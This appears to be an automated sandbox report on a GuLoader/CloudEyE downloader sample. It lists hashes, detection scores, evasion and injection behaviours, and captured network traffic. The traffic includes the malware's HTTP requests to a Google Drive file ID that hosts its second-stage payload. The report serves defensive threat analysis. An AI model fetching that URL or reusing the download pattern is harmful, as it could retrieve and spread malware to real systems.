
Windows Analysis Report
Osb7hkGfAb.exe

Overview

General Information

Sample name: Osb7hkGfAb.exe (renamed because the original name is a hash value)
Original sample name: ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6.exe
Analysis ID: 1587621
MD5: a09950fd9af3c4e3ff6f778ab5d8ce0f
SHA1: 043462f3e5a9b3133908c39e6c3fd8a4f0cade1b
SHA256: ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6
Tags: exe, user-adrian__luca

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Osb7hkGfAb.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\Osb7hkGfAb.exe" MD5: A09950FD9AF3C4E3FF6F778AB5D8CE0F)
    • Osb7hkGfAb.exe (PID: 2900 cmdline: "C:\Users\user\Desktop\Osb7hkGfAb.exe" MD5: A09950FD9AF3C4E3FF6F778AB5D8CE0F)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

No configs have been found

Yara matches:
Source: 00000006.00000002.3327433008.00000000017C6000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security
Source: 00000000.00000002.2779618167.0000000002A16000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security

No Sigma rule has matched

Suricata IDS alerts:
Timestamp: 2025-01-10T16:02:25.047759+0100; SID: 2803270; Severity: 2; Classtype: Potentially Bad Traffic; Source IP: 192.168.2.10; Source Port: 49708; Destination IP: 142.250.184.238; Destination Port: 443; Protocol: TCP


      AV Detection

Source: Osb7hkGfAb.exe; Avira: detected
Source: Osb7hkGfAb.exe; ReversingLabs: Detection: 75%
Source: Osb7hkGfAb.exe; Virustotal: Detection: 68%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: Osb7hkGfAb.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.10:49710 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49780 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49981 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.10:49984 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49985 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.10:49988 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49991 version: TLS 1.2
Source: Osb7hkGfAb.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshtml.pdb; source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: mshtml.pdbUGP; source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe; Code function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe; Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe; Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49708 -> 142.250.184.238:443
Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: global trafficHTTP traffic detected: GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR8Md_kYyzkQHPJy7LqpY8sov7GfnKuFPC628Gfq7ohmnTOKXT-3Tum-SBFUE6BBTg4wLX_lOQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:02:25 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-77mX5IRpx2Zk0xzZUVtWDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: 
NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE; expires=Sat, 12-Jul-2025 15:02:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5nIunltLmQZYqr8neEQ0YE_O6jOubGEhCqfTIC5mlahuNHO9ljCvxc_mYE7BoBJ8Vwv7HEKXEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:03:51 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-5_tmSxbga8swmxmDa0vFsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lav6-uZMJwRtmv2-xrQ6Wrts5kfLgLVx4Q7gvPpDNTBADWRdzA50TqPz0zbtPY9FEYvezCg4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:04:03 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-i-AOsg2TUseIMYgUH_FIdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTdHiyZGj-LlWeHpQ1ae8TNcUR_QyDTuYfOSndtv-sI9p7jL1lhWb7Q7xwxhxpYrRHH_GLrjEoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 15:04:15 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-bwxC__Euzb-00dSfBV4RPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: Osb7hkGfAb.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Osb7hkGfAb.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=d
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.go
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/#/b
      Source: Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/0h
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/6
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/B
      Source: Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download0
      Source: Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloade
      Source: Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadxq3
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/_1
      Source: Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ificate
      Source: Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/lR
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ogle.co.jp
      Source: Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=do
      Source: Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/th
      Source: Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4$
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL43
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4:
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4A
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4B
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4O
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4R
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4_
